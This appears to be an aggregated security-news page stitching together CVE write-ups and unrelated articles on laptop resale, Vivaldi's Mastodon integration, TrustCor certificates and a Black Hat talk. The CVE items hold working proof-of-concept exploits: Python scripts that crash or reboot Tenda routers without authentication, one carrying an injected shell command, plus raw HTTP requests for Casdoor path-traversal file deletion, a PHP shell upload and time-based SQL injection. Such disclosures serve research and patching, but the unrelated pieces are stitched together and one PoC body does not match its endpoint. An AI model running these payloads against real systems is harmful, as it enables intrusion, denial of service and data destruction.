Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the cmdinput parameter at /goform/exeCommand.

Permalink

Cannot retrieve contributors at this time

**Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2218.html
    

**Affected version**

**Vulnerability details**

In /goform/exeCommand, cmdinput will be copied to s by strcpy. It is worth noting that there is no size check, resulting in a stack overflow vulnerability

**Poc**

import requests

target\_url \= 'http://192.168.10.103/login/Auth'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.103/goform/exeCommand'

target\_headers \= {'Host' : '192.168.10.103',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.103',
'Referer' : 'http://192.168.10.103/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router crashed, and finally you can write an exp to get a root shell

CVE-2022-45505: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolReboot) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolReboot, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolReboot'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'cmdinput=asd;ls -la . > ./tmp/test;aa'

requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45498: IOT_Vul/readme.md at main · z1r00/IOT_Vul

An issue in the component tpi_systool_handle(0) (/goform/SysToolRestoreSet) of Tenda W6-S v1.0.0.4(510) allows unauthenticated attackers to arbitrarily reboot the device.

Permalink

**Tenda W6-S V1.0.0.4(510) Reboot router without authentication****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/SysToolRestoreSet, tpi\_systool\_handle(0) will cause the entire router to reboot without authorization

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/SysToolRestoreSet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'linkEn=1&ping1=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

You can see that the router restarts

CVE-2022-45504: IOT_Vul/readme.md at main · z1r00/IOT_Vul

By Owais Sultan
Before selling or trading in your laptop, it is important to prepare the device for its new owner as this will help ensure all of your personal data remains safe.
This is a post from HackRead.com Read the original post: Don’t Sell Your Laptop Without Following These Steps

In an age when every day, a new version of a laptop with better features, sleek design, and improved performance hits the market, it is no wonder that you also wish to buy a new laptop to achieve excellence in performance and enjoy new features.

You have money, you can buy a new laptop, great! But what about your previous laptop? If you are thinking of selling it, then…stop.

If you think selling a laptop is all about saving your data, finding a seller, and selling it, then you need to think again. It goes beyond this! It is not all about getting a fair price, but also saving your personal information and private data from reaching a stranger – that might cost you a lot if that stranger is fraudulent or malicious.

Before selling or trading in your laptop, it is important to prepare the device for its new owner. This can be done by taking several simple precautions that will help ensure all of your personal data remains safe.

**1 Save Your Important Data**

It goes without saying that your first step should be keeping a **backup of your essential data**, including personal and work-related files and folders, containing documents, presentations, emails, plans, strategies, or anything else that you have prepared with so much hard work.

If you don’t want to see your data slipping from your fingers, then this should be your number one step.

You can save your data on a data drive or upload it to a reliable **cloud service**. Or send them to your own email address (well, this is my favorite way of saving my data!). Do whatever suits you, but saving data is a must before selling your laptop.

However, this can only work if you have a few GB of data. In case you have terabytes of data then owning a workstation from companies like **Western Digital (WD)** is a good way to go.

**2 Delete Passwords Permanently**

Nobody wants the passwords of important accounts to get leaked. Full stop! But have you ever thought about how to save your passwords before giving your laptop? What — did you just say you can do it by signing off from all your accounts and deleting history and cookies? Ah, I wish it was really that easy, but it is not. 

Where technology has brought so much **ease into our lives**, there it has also become a trouble in many ways — like this one. Unfortunately, some software can extract passwords even if you log out from your accounts.

That is where you should act smartly if you don’t want someone to sneak into your Facebook and start sending weird messages through your accounts to your friends. It could trigger so many controversies – eh. So, cut iron with iron.

You can also use apps such as password generators. One such example is the **IPVanish** password generator which lets users delete passwords permanently from their browsers. If you wish to do that manually, follow these easy steps:

**For Chrome browser:** First, open Chrome and click on the three-dot menu icon located in the top right corner. Then select “Settings” and click on “Passwords” under Autofill. Here you will find a list of all the websites that have saved credentials, along with their usernames and passwords.

Select an entry to see the details, then click on the three-dot menu icon next to it and select “Remove.” You’ll be asked to confirm by clicking “remove” again; once confirmed all login information for that website will be deleted from your computer. (_Read more on_ **Google**.)

**For Firefox:** First, launch the Firefox browser on your device. Then, click the ‘Menu’ icon (three lines in the upper right corner) and select ‘Options’ or ‘Preferences’. In this menu, you will see a section for ‘Logins & Passwords. You can then scroll through all of your saved logins and passwords until you find the one that needs to be deleted.

**For Safari Browser:** To begin, open up the Safari browser on your computer and click the ‘Safari’ menu at the top left corner. In that menu option, select ‘Preferences’ and then navigate to the ‘Passwords’ tab. (Read more on **Mozilla**.)

Here you will see a list of all of your stored passwords that have been saved by Safari. To delete one or more of these passwords, simply check off each box next to each entry that you wish to remove and hit delete in the bottom right corner. (Read more on **Apple**.)

**3 Format the Drive**

Have you saved your important data? Great! Now, what about data that is still on your laptop? Obviously, you can’t leave it like this for others to see your private information and confidential data. No, just deleting data files and clearing Recycle Bin or Shift + Delete might not work. It can still keep the issue of data leakage and privacy breaches there. 

In this condition, most people go for drive formatting that cleans up your laptop and makes it data free. However, this method works if your files are overwritten and you are using a solid-state drive (SSD) with TRIM enabled.

With HDD or TRIM disabled, you would have to overwrite the hard drive if you don’t want cheap software to recover your data – yes, even after formatting. It is very easy to recover a permanently deleted file through even cheap software. So, be safe than sorry!

**4 Prepare Your Laptop for Selling**

Once you are done saving your information, next, it is time to prepare your laptop for sale at a good price. The price of your gadget also depends on its model, functionalities, current market price, and a lot more. However, improving the outer condition, and speed, upgrading Windows, and enhancing the memory storage can enhance the price of your laptop. 

So, work on the following things to get good bucks:

*   First, install the latest Windows to make your buyer happy. You can vow anyone with the latest functionalities already installed on the laptop, so that person wouldn’t have to go through all the trouble. It is a good chance to impress a buyer.

*   Second, work on the speed of the laptop. Half of the work is already done when you delete files and data. So, reset the laptop to speed it up.

*   Clean up your laptop, please. Don’t take your laptop to a buyer with all the lint or dust trapped between keys and scratches on the screen. You can remove lint or dust with a brush and change the screen cover. This simple work can make a lot of difference.

*   Lastly, visit a laptop expert and ask for a thorough inspection so that you can rectify if there are any internal faulty parts.

1.  **World’s most dangerous laptop has been sold for $1.3 million**
2.  **BusKill USB cable switches off your laptop in the event of theft**
3.  **German army’s sensitive data found on laptop bought from eBay**
4.  **World’s most dangerous laptop ‘Persistence of Chaos’ up for auction**

Don’t Sell Your Laptop Without Following These Steps

Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.

CVE-2022-23491: concerns about Trustcor

By Habiba Rashid
From December 7th, 2022, their Mastodon instance, Vivaldi Social, will be integrated into the sidebar of the desktop browser, creating an inbuilt Mastodon client for users.
This is a post from HackRead.com Read the original post: Vivaldi Integrates Mastodon Into its Web Browser

Riding the **Mastodon hype**, Vivaldi recently became the first browser to not only have its own Mastodon instance, Vivaldi Social but to also integrate Mastodon into its newest browser version, Vivaldi 5.6. available on Windows, macOS, and Linux.

In the recent update where the company announced its newest functionality, it also explained how **Mastodon** matched its values to give its users an algorithm-free experience with no surveillance capitalism or data profiling. 

According to the company’s **press release**, From December 7th, 2022, their Mastodon instance, Vivaldi Social, will be integrated into the sidebar of the desktop browser, creating an inbuilt Mastodon client for users. However, users will have the option to add any Mastodon server of their choice to the sidebar.

The new feature does not demand implementation and can be ignored if it is not up your alley. Moreover, the app does not run in the background which means that system resources or valuable bandwidth will not be used unless you open the panel.

Vivaldi Social has expanded to around 11,000 people ever since it went live in mid-November.  Vivaldi’s founder **Jon Stephenson von Tetzchner** explained that they “support the idea of a decentralized federated social media network like Mastodon.” 

Along with the creation of its own Mastodon instance, comes the responsibility of dealing with content moderation but the company remains confident that it has the expertise necessary to tackle the thorny issue. 

1.  **Trust Wallet Launches Browser Extension Wallet for Desktop**
2.  **8 Online Best Dark Web Search Engines for Tor Browser (2022)**
3.  **Improving privacy: Alternative browsers and chrome extensions**
4.  **Meet Plexus, An AI-based Browser Security Solution from LayerX**
5.  **Guardio: Can This Browser Extension Protect You From Cybercrime?**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Vivaldi Integrates Mastodon Into its Web Browser

Empower buyers and stop fixating about zero-days, conference attendees told

Empower buyers and stop fixating about zero-days, conference attendees told

  

Steps towards building a defendable internet are possible, but to get there the industry needs to accept baseline security regulations and move away from a fixation about zero-day vulnerabilities.

Opening the Black Hat Europe conference on Tuesday, security researcher Daniel Cuthbert praised security improvements gained with the wider adoption of cloud computing, improvements in iOS, and tighter web security controls in Google Chrome, among other developments.

One problem, however, is that these improvements are not feeding down to provide improvements in security practices more generally.

Read more of the latest news about Black Hat conference

Cuthbert posed the question: “Does good security mean a lock-in approach or are we actually capable of building an open, transparent, and yet secure internet for all to enjoy?”

According to Cuthbert, the industry is too fixated on zero-days, despite most cyber-attacks still proving successful using run-of-the-mill techniques such as phishing.

“During Covid we saw a lot of people tear apart products to look for bugs,” Cuthbert said. “A lot of criminals did too.”

There were 32 zero-days recorded in 2019, according to figures cited by Cuthbert. This figure dropped to 30 in 2021 before rising to 70 in 2021.

“Lots of zero-days arise because vendors failed to fix bugs,” according to Cuthbert.

Because zero-day exploits can be a weapon in the hands of cybercriminals or spies, researchers need to be more responsible and release detection methods alongside proof-of-concept exploits when they release research, according to Cuthbert.

**Knee jerk reactions need to stop**

Cuthbert criticized the industry for falling into a cycle of offering tools to overcome the shortcomings of earlier security products rather than attempting to identify and address the root cause of problems.

For example, the shortcomings of first-generation firewalls were addressed with the development of web application firewalls – a class of product that has itself been a source of security problems.

Cuthbert said: “Can we stop the cycle of building tools to fix the tools that aren’t secure enough?”

The researcher also criticized the industry from blaming end users – such as, as he put it, ‘Dave from accounts’ – for falling victim to phishing attacks.

Buyers currently have no meaningful influence on the security of products, a trend that needs to change.

Vendors should also be asked hard questions about threat modeling, supply chain security, and should be pushed to use memory safe languages during the procurement process.

YOU MAY ALSO LIKE Cybersecurity conferences 2022: A rundown of online, in person, and ‘hybrid’ events

Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.

Hi,

I was looking at the fix to #1035:  

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.  
Thus, it's possible to delete any file outside application's webroot:  

POC request:

    POST /api/delete-resource?provider= HTTP/1.1
    Host: localhost:8008
    Content-Length: 363
    sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Content-Type: text/plain;charset=UTF-8
    Accept: */*
    Origin: http://localhost:8008
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:8008/resources
    Accept-Encoding: gzip, deflate
    Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
    Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
    Connection: close
    
    {"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}

CVE-2022-44942: Arbitrary file delete vulnerability · Issue #1171 · casdoor/casdoor

Online Leave Management System v1.0 was discovered to contain an arbitrary file upload vulnerability at /leave_system/classes/SystemSettings.php?f=update_settings. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

vulnerability location：There is an arbitrary file upload vulnerability in the "Settings" module in the background management system

    POST /leave_system/classes/SystemSettings.php?f=update_settings HTTP/1.1
    Host: localhost
    Content-Length: 4027
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTRvq9tuWvBA7y1xY
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/leave_system/admin/?page=system_info
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=29pn5i5a8eeab4dp29po24hgn5
    Connection: close
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="name"
    
    Online Leave Management System - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="short_name"
    
    OLMS - PHP
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="about_us"
    
    <p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer vel pharetra elit. Suspendisse potenti. Quisque aliquam justo ut ipsum porta ullamcorper. Curabitur ac lectus hendrerit, tristique sem in, cursus sapien. Vivamus metus augue, pharetra ac lobortis vel, eleifend sed diam. Sed lacus mauris, dictum eget est in, maximus egestas arcu. Nunc vel est ut est elementum laoreet. Phasellus quis tincidunt ex. Morbi vestibulum molestie turpis, id pellentesque augue viverra in. Donec laoreet lorem id viverra molestie. Vivamus in odio sed lectus ultricies eleifend. Nunc eget erat blandit, tristique odio nec, blandit purus. Vivamus facilisis laoreet ex, vel ultricies nisl molestie in. Proin laoreet finibus nulla quis auctor. Etiam pulvinar ligula et diam tincidunt dapibus.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;">Nulla pulvinar nisl nec neque mollis imperdiet. Curabitur dignissim convallis arcu, a maximus neque dictum id. Praesent justo libero, semper sed auctor eu, ultricies id quam. Sed et orci non sem imperdiet lobortis at non mi. Suspendisse consectetur consectetur dolor, interdum imperdiet orci venenatis nec. Sed vehicula orci sollicitudin facilisis ultricies. Mauris non nibh nec orci convallis mollis ac in lectus. Cras eu cursus urna, non semper mi. Ut in tortor in odio feugiat interdum. Integer ut ante non purus luctus maximus eu vitae nulla. Nam quam felis, condimentum non molestie sed, ornare at nunc. In rhoncus mi id justo gravida congue.</p>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="img"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY
    Content-Disposition: form-data; name="cover"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryTRvq9tuWvBA7y1xY--
    
    

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-45009: bug_report/UPLOAD.md at main · realguoxiufeng/bug_report

Simple Phone Book/Directory Web App v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /PhoneBook/edit.php.

**Simple Phone book/directory Web App v1.0 by bakhtiar has SQL injection**

BUG\_Author: realguoxiufeng

vendors:https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html

Vulnerability File: /PhoneBook/edit.php

GET parameter 'editid' exists SQL injection vulnerability

Payload1: /PhoneBook/edit.php?editid=1'

    GET /PhoneBook/edit.php?editid=1' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

sql statement error

Payload2: /PhoneBook/edit.php?editid=1''

    GET /PhoneBook/edit.php?editid=1'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

Page successfully displayed

Payload3: /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B

    GET /PhoneBook/edit.php?editid=1%27%20AND%20(SELECT%202%20FROM%20(SELECT(SLEEP(10)))A)--%20B HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=h2td7dda0p1f3dha0mjlejh9vb
    Connection: close
    

The server's response time is 10 seconds

Tag

#chrome